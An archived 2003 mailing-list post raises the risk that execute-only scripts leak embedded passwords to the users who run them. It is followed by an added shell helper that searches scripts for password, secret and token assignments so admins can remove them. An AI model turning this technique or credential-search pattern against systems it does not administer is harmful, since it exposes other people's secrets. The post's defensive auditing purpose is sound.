Date: Wed, 12 Feb 2003 03:21:49 +0000 (GMT)
From: Jon Masters <[email protected]>
To: [email protected]
Subject: Solaris Signals
Hi,

We all know that old chestnut about tracing setuid programs or scripts,
but what about non-setuid scripts which have been installed for users and
given execute-only permission? For example, a lot of sites provide scripts
for users to run which perform some admin-related function and thus have
usernames or passwords within them - potentially free to users.

The thing I want to do is make a few people think about fixing this by
taking whatever steps are necessary on a per-installation basis. It is a
silly kind of thing which seems to be overlooked all too often. There is
some trivial code attached for those who really do not see my point.

This is bound to be covered somewhere, I just want to get viewpoints.

Jon.
Attachment: sigtest.c
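An audit helper for the situation the mail describes, added here as an example and not the sigtest.c attached to the original post: it walks a directory tree for interpreted scripts that rely on execute-only permission for other users (mode has o+x but not o+r) and flags the ones that contain password-like assignments, so the credentials can be moved out of the script. The function name, the directory argument and the credential regex are my own assumptions.

```shell
#!/bin/sh
# find_exec_only_scripts DIR
# Prints, one per line, the files under DIR that:
#   1. are executable but not readable by "other" (execute-only protection),
#   2. are interpreter scripts (first line begins with "#!"), and
#   3. contain an assignment or option that looks like a password/secret.
# Execute-only permission does not keep a script's contents confidential from
# the users who run it (the interpreter has to read it), so such files are
# the ones whose embedded credentials need to be removed. Hypothetical helper,
# written for this mail; the regex is a heuristic, not an exhaustive check.
find_exec_only_scripts() {
    dir=$1
    # -perm -o=x: others have execute; ! -perm -o=r: others lack read.
    find "$dir" -type f -perm -o=x ! -perm -o=r -print 2>/dev/null |
    while read -r f; do
        # Only interpreted scripts matter here (binaries are a different story).
        head -n 1 "$f" 2>/dev/null | grep -q '^#!' || continue
        # Credential heuristic: PASSWORD=..., passwd: ..., SECRET=..., token=...
        if grep -Eiq '(passw(or)?d|secret|token)[[:space:]]*[=:]' "$f"; then
            echo "$f"
        fi
    done
}
```

Run it as the owner of the scripts (or root) so the files are readable to the audit itself; a non-empty result is the list of scripts whose credentials should be moved into a file the calling users cannot read, or replaced with a mechanism that does not embed them at all.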